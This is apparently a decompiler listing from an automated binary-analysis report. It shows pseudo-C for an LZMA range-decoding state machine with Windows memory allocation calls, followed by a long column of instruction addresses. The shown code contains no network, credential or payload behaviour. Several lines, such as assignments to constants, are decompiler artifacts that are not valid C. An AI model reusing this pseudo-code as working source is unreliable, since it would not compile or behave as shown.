							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406E99))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004065f6
0x004065f6
0x004065fb
0x00406672
0x00406679
0x00406683
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x00000000
0x00406cb3
0x00406cb3
0x00406cb7
0x00406e66
0x00000000
0x00406e66
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00000000
0x00406cd5
0x004065fd
0x004065fd
0x00406601
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x00406622
0x00406629
0x0040662c
0x00406637
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406646
0x00406664
0x00406666
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x0040688b
0x0040688e
0x00406831
0x00406837
0x00000000
0x00000000
0x00000000
0x00406890
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682e
0x00000000
0x0040682e
0x00406648
0x00406648
0x0040664b
0x00406651
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x0040673a
0x0040673d
0x004066b4
0x004066b4
0x004066ba
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c7
0x004067ca
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x0040676a
0x0040676a
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d5
0x004067d5
0x004067d8
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x004069a1
0x004069a1
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x004066c6
0x00000000
0x00000000
0x00000000
0x00406743
0x0040668f
0x00406693
0x00406e00
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00406e98
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066b1
0x00000000
0x004066b1
0x0040673d
0x00406646
0x0040647a
0x0040647a
0x00406483
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
